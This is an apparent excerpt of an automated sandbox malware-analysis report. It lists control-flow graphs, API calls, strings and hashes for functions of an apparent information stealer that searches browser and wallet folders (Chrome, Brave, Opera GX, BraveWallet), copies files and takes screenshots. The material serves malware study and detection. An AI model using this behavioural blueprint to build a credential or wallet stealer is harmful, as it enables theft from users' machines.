                                                                                    • Opcode ID: 0ad7276aa294dbd547a4d96f96a942a7d0334b21d4d2b34b5b54ff39ca66d9ac
                                                                                    • Instruction ID: d7c5970f0897ada52bebf96924e878e3ecce30d18c8aa08c600bdb313c44272c
                                                                                    • Opcode Fuzzy Hash: 0ad7276aa294dbd547a4d96f96a942a7d0334b21d4d2b34b5b54ff39ca66d9ac
                                                                                    • Instruction Fuzzy Hash: 51424EB190414DEADB11EBE1C956BEEBBB8AF18308F50017EE505B3582DA781B4CCB65
                                                                                    Function 0040C679 Relevance: 44.7, APIs: 19, Strings: 6, Instructions: 924fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1469 40c679-40c72b _EH_prolog call 40f923 call 40fa28 call 40fa9c call 40f9e1 call 40f98e * 2 call 40f923 * 2 call 40fb4d FindFirstFileA 1488 40c772-40c778 1469->1488 1489 40c72d-40c76d call 40f98e * 3 call 401061 call 40f98e 1469->1489 1490 40c77a-40c78e StrCmpCA 1488->1490 1519 40d3d4-40d3f9 call 40f98e * 2 1489->1519 1492 40d374-40d386 FindNextFileA 1490->1492 1493 40c794-40c7a8 StrCmpCA 1490->1493 1492->1490 1495 40d38c-40d3d1 FindClose call 40f98e * 3 call 401061 call 40f98e 1492->1495 1493->1492 1496 40c7ae-40c83a call 40f997 call 40fa28 call 40fa9c * 2 call 40f9e1 call 40f98e * 3 1493->1496 1495->1519 1536 40c840-40c859 call 40fb4d StrCmpCA 1496->1536 1537 40c99f-40ca34 call 40fa9c * 4 call 40f9e1 call 40f98e * 3 1496->1537 1542 40c8ff-40c99a call 40fa9c * 4 call 40f9e1 call 40f98e * 3 1536->1542 1543 40c85f-40c8fa call 40fa9c * 4 call 40f9e1 call 40f98e * 3 1536->1543 1586 40ca3a-40ca5c call 40f98e call 40fb4d StrCmpCA 1537->1586 1542->1586 1543->1586 1595 40ca62-40ca76 StrCmpCA 1586->1595 1596 40cc7b-40cc90 StrCmpCA 1586->1596 1595->1596 1597 40ca7c-40cbf5 call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 call 40f923 call 40fa9c * 2 call 40f9e1 call 40f98e * 2 call 40f95a call 40618b 1595->1597 1598 40cc92-40ccf5 call 4010b1 call 40f95a * 3 call 40c27b 1596->1598 1599 40cd05-40cd1a StrCmpCA 1596->1599 1804 40cc44-40cc76 call 40fb4d call 40fb14 call 40fb4d call 40f98e * 2 1597->1804 1805 40cbf7-40cc3f call 40f95a call 4010b1 call 414437 call 40f98e 1597->1805 1653 40ccfa-40cd00 1598->1653 1600 40cd96-40cdb1 call 40f95a call 410cdd 1599->1600 1601 40cd1c-40cd33 call 40fb4d StrCmpCA 1599->1601 1624 40ce37-40ce4c StrCmpCA 1600->1624 1625 40cdb7-40cdba 1600->1625 1613 40d2e3-40d2ea 1601->1613 1614 40cd39-40cd3c 1601->1614 1617 40d364-40d36f call 40fb14 * 2 1613->1617 1618 40d2ec-40d359 call 40f95a * 2 call 40f923 call 4010b1 call 40c679 1613->1618 1614->1613 1620 40cd42-40cd94 call 4010b1 call 40f95a * 2 1614->1620 1617->1492 1685 40d35e 1618->1685 1670 40ce15-40ce27 call 40f95a call 406737 1620->1670 1630 40d0d0-40d0e5 StrCmpCA 1624->1630 1631 40ce52-40cf43 call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 CopyFileA 1624->1631 1625->1613 1633 40cdc0-40ce12 call 4010b1 call 40f95a call 40f923 1625->1633 1630->1613 1641 40d0eb-40d1dc call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 2 CopyFileA 1630->1641 1750 40d027-40d040 call 40fb4d StrCmpCA 1631->1750 1751 40cf49-40d021 call 4010b1 call 40f95a * 3 call 406e2a call 4010b1 call 40f95a * 3 call 407893 1631->1751 1633->1670 1752 40d2c0-40d2d2 call 40fb4d DeleteFileA call 40fb14 1641->1752 1753 40d1e2-40d2ba call 4010b1 call 40f95a * 3 call 4071c6 call 4010b1 call 40f95a * 3 call 4074e2 1641->1753 1653->1613 1691 40ce2c-40ce32 1670->1691 1685->1617 1691->1613 1764 40d0b1-40d0c3 call 40fb4d DeleteFileA call 40fb14 1750->1764 1765 40d042-40d0ab call 4010b1 call 40f95a * 3 call 407ec7 1750->1765 1751->1750 1779 40d2d7 1752->1779 1753->1752 1787 40d0c8-40d0cb 1764->1787 1765->1764 1785 40d2da-40d2de call 40f98e 1779->1785 1785->1613 1787->1785 1804->1596 1805->1804
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040C67E
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00425B7B,00425B7A,00000000,?,00425CC4,?,?,00425B77,?,?,00000000), ref: 0040C71F
                                                                                    • StrCmpCA.SHLWAPI(?,00425CC8,?,?,00000000), ref: 0040C786
                                                                                    • StrCmpCA.SHLWAPI(?,00425CCC,?,?,00000000), ref: 0040C7A0
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00425CD0,?,?,00425B7E,?,?,00000000), ref: 0040C851
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                    • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                    • API String ID: 3869166975-1816240570
                                                                                    • Opcode ID: 9804cbcb6549636e7edce159aa3ee5a2d29b2506f6b57e35bae4b86771403b22
                                                                                    • Instruction ID: 88dffd7cdbcf1f4ae3e67456db78224bf6b474b6b2878ab6084e2e33bf0d65cc
                                                                                    • Opcode Fuzzy Hash: 9804cbcb6549636e7edce159aa3ee5a2d29b2506f6b57e35bae4b86771403b22
                                                                                    • Instruction Fuzzy Hash: 67826070900288EADF25EBA5C955BDDBBB4AF19304F5040BEE449B32C2DB78174CCB66
                                                                                    Function 004153F6 Relevance: 44.1, APIs: 21, Strings: 4, Instructions: 316stringfileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1847 4153f6-415469 _EH_prolog call 4181c0 wsprintfA FindFirstFileA memset * 2 1850 41581b-415835 call 401061 1847->1850 1851 41546f-415483 StrCmpCA 1847->1851 1852 415489-41549d StrCmpCA 1851->1852 1853 4157fa-41580c FindNextFileA 1851->1853 1852->1853 1855 4154a3-4154df wsprintfA StrCmpCA 1852->1855 1853->1851 1856 415812-415815 FindClose 1853->1856 1858 4154e1-4154f9 wsprintfA 1855->1858 1859 4154fb-41550a wsprintfA 1855->1859 1856->1850 1860 41550d-41553e memset lstrcat 1858->1860 1859->1860 1861 415561-41556b strtok_s 1860->1861 1862 415540-415551 1861->1862 1863 41556d-4155a1 memset lstrcat 1861->1863 1868 415785-41578b 1862->1868 1871 415557-415560 1862->1871 1864 4156e1-4156eb strtok_s 1863->1864 1865 4156f1 1864->1865 1866 4155a6-4155b6 PathMatchSpecA 1864->1866 1865->1868 1869 4156d7-4156e0 1866->1869 1870 4155bc-4156bb call 40f923 call 410b5c call 40fa9c call 40fa28 call 40fa9c call 40fa28 call 40f9e1 call 40f98e * 5 call 40fb4d * 3 call 410f12 call 418360 1866->1870 1868->1853 1872 41578d-415799 1868->1872 1869->1864 1915 4156f6-415705 1870->1915 1916 4156bd-4156d2 call 40fb4d call 40f98e 1870->1916 1871->1861 1872->1856 1874 41579b-4157a3 1872->1874 1874->1853 1876 4157a5-4157ef call 4010b1 call 4153f6 1874->1876 1884 4157f4 1876->1884 1884->1853 1917 415836-415841 call 40f98e 1915->1917 1918 41570b-41572e call 40f95a call 40618b 1915->1918 1916->1869 1917->1850 1929 415730-415775 call 40f923 call 4010b1 call 414437 call 40f98e 1918->1929 1930 41577a-415780 call 40f98e 1918->1930 1929->1930 1930->1868
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004153FB
                                                                                    • wsprintfA.USER32 ref: 00415421
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                                    • memset.MSVCRT ref: 0041544F
                                                                                    • memset.MSVCRT ref: 0041545D
                                                                                    • StrCmpCA.SHLWAPI(?,004267F4), ref: 0041547B
                                                                                    • StrCmpCA.SHLWAPI(?,004267F8), ref: 00415495
                                                                                    • wsprintfA.USER32 ref: 004154B9
                                                                                    • StrCmpCA.SHLWAPI(?,00426516), ref: 004154CA
                                                                                    • wsprintfA.USER32 ref: 004154F0
                                                                                    • wsprintfA.USER32 ref: 00415504
                                                                                    • memset.MSVCRT ref: 00415516
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415528
                                                                                    • strtok_s.MSVCRT ref: 00415561
                                                                                    • memset.MSVCRT ref: 00415576
                                                                                    • lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                                    • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004155AE
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004156B0
                                                                                    • strtok_s.MSVCRT ref: 004156E1
                                                                                    • FindNextFileA.KERNELBASE(000000FF,?), ref: 00415804
                                                                                    • FindClose.KERNEL32(000000FF), ref: 00415815
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                    • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                    • API String ID: 264515753-332874205
                                                                                    • Opcode ID: d20dc5bdacd583ed27b03aefafc9fd92c8039eee4d847269b8182252768ee144
                                                                                    • Instruction ID: ca9661dadf250ee48b6985f068276dcce33099c5ed12ff06a98e026076f1a7f9
                                                                                    • Opcode Fuzzy Hash: d20dc5bdacd583ed27b03aefafc9fd92c8039eee4d847269b8182252768ee144
                                                                                    • Instruction Fuzzy Hash: F2C160B1D0015DEEDF20EBE4DC45EDEBBBCAB08304F50406AF519A3191DB389A49CB65
                                                                                    Function 6CC335A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2637 6cc335a0-6cc335be 2638 6cc335c4-6cc335ed InitializeCriticalSectionAndSpinCount getenv 2637->2638 2639 6cc338e9-6cc338fb call 6cc6b320 2637->2639 2640 6cc335f3-6cc335f5 2638->2640 2641 6cc338fc-6cc3390c strcmp 2638->2641 2643 6cc335f8-6cc33614 QueryPerformanceFrequency 2640->2643 2641->2640 2645 6cc33912-6cc33922 strcmp 2641->2645 2646 6cc3361a-6cc3361c 2643->2646 2647 6cc3374f-6cc33756 2643->2647 2648 6cc33924-6cc33932 2645->2648 2649 6cc3398a-6cc3398c 2645->2649 2650 6cc33622-6cc3364a _strnicmp 2646->2650 2652 6cc3393d 2646->2652 2653 6cc3396e-6cc33982 2647->2653 2654 6cc3375c-6cc33768 2647->2654 2648->2650 2651 6cc33938 2648->2651 2649->2643 2655 6cc33650-6cc3365e 2650->2655 2656 6cc33944-6cc33957 _strnicmp 2650->2656 2651->2647 2652->2656 2653->2649 2657 6cc3376a-6cc337a1 QueryPerformanceCounter EnterCriticalSection 2654->2657 2658 6cc3395d-6cc3395f 2655->2658 2659 6cc33664-6cc336a9 GetSystemTimeAdjustment 2655->2659 2656->2655 2656->2658 2660 6cc337b3-6cc337eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2657->2660 2661 6cc337a3-6cc337b1 2657->2661 2664 6cc33964 2659->2664 2665 6cc336af-6cc33749 call 6cc6c110 2659->2665 2662 6cc337ed-6cc337fa 2660->2662 2663 6cc337fc-6cc33839 LeaveCriticalSection 2660->2663 2661->2660 2662->2663 2666 6cc33846-6cc338ac call 6cc6c110 2663->2666 2667 6cc3383b-6cc33840 2663->2667 2664->2653 2665->2647 2672 6cc338b2-6cc338ca 2666->2672 2667->2657 2667->2666 2673 6cc338dd-6cc338e3 2672->2673 2674 6cc338cc-6cc338db 2672->2674 2673->2639 2674->2672 2674->2673
                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBF688,00001000), ref: 6CC335D5
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC335E0
                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 6CC335FD
                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC3363F
                                                                                    • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC3369F
                                                                                    • __aulldiv.LIBCMT ref: 6CC336E4
                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6CC33773
                                                                                    • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC3377E
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC337BD
                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6CC337C4
                                                                                    • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC337CB
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC33801
                                                                                    • __aulldiv.LIBCMT ref: 6CC33883
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CC33902
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CC33918
                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CC3394C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                    • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                    • API String ID: 301339242-3790311718
                                                                                    • Opcode ID: bce91024ca0b33ad1c7eb9efa07ebd08f3abaf721314da05dbca1aae7698ec0c
                                                                                    • Instruction ID: 43f56405c037018c2c9e4feb9d2439c0183ddd71e891c25ef2bc61644d77eb84
                                                                                    • Opcode Fuzzy Hash: bce91024ca0b33ad1c7eb9efa07ebd08f3abaf721314da05dbca1aae7698ec0c
                                                                                    • Instruction Fuzzy Hash: EAB1F879B043119FDB08DFA8D85561A77F5FB8A700F09892EE899D3750E770D801CB9A
                                                                                    Function 004162AF Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227stringfileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004162B4
                                                                                    • wsprintfA.USER32 ref: 004162D4
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                    • StrCmpCA.SHLWAPI(?,004268B0), ref: 00416308
                                                                                    • StrCmpCA.SHLWAPI(?,004268B4), ref: 00416322
                                                                                    • wsprintfA.USER32 ref: 00416346
                                                                                    • StrCmpCA.SHLWAPI(?,00426525), ref: 00416357
                                                                                    • wsprintfA.USER32 ref: 00416374
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • wsprintfA.USER32 ref: 00416388
                                                                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                    • lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                    • lstrcat.KERNEL32(?,004268CC), ref: 004163D9
                                                                                    • lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                    • lstrcat.KERNEL32(?,004268D0), ref: 004163FB
                                                                                    • lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                    • FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                    • API String ID: 3254224521-445461498
                                                                                    • Opcode ID: f1e2c898751335988b89725b49f2b994cd233f31897e165e0f6e33926c86069b
                                                                                    • Instruction ID: 44fee943ad19fbeb295e67141fcee366af0812e97ca0ac8f0a151d0c2a205fa7
                                                                                    • Opcode Fuzzy Hash: f1e2c898751335988b89725b49f2b994cd233f31897e165e0f6e33926c86069b
                                                                                    • Instruction Fuzzy Hash: 97918C71900259ABDF10EBE4DD4ABDEBBBDAF09304F4040BAF505A3191DB389B48CB65
                                                                                    Function 004112FD Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 162windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00411302
                                                                                    • memset.MSVCRT ref: 00411328
                                                                                    • GetDesktopWindow.USER32 ref: 0041135E
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041136B
                                                                                    • GetDC.USER32(00000000), ref: 00411372
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0041137C
                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041138D
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00411398
                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004113B4
                                                                                    • GlobalFix.KERNEL32(?), ref: 00411412
                                                                                    • GlobalSize.KERNEL32(?), ref: 0041141E
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004043AD: _EH_prolog.MSVCRT ref: 004043B2
                                                                                      • Part of subcall function 004043AD: lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                      • Part of subcall function 004043AD: StrCmpCA.SHLWAPI(?,00425987,00425983,0042597B,00425977,00425976), ref: 004044A4
                                                                                      • Part of subcall function 004043AD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00411498
                                                                                    • DeleteObject.GDI32(?), ref: 004114B3
                                                                                    • DeleteObject.GDI32(00000000), ref: 004114BA
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 004114C4
                                                                                    • CloseWindow.USER32(00000000), ref: 004114CB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                                    • String ID: image/jpeg
                                                                                    • API String ID: 3067874393-3785015651
                                                                                    • Opcode ID: 3bdf46d3e9d7c0e78ba7912a53a363b2d7867d1b528b743ce995cd4dcfebb4b6
                                                                                    • Instruction ID: b777bc6b67979350ab37bc7b6ce454515ef26c15ee534ccd721ea0ab8c47e668
                                                                                    • Opcode Fuzzy Hash: 3bdf46d3e9d7c0e78ba7912a53a363b2d7867d1b528b743ce995cd4dcfebb4b6
                                                                                    • Instruction Fuzzy Hash: 385118B2D00218AFDF01AFE5DD499EEBFB9FF09714F10402AFA05E2160D7394A558BA5
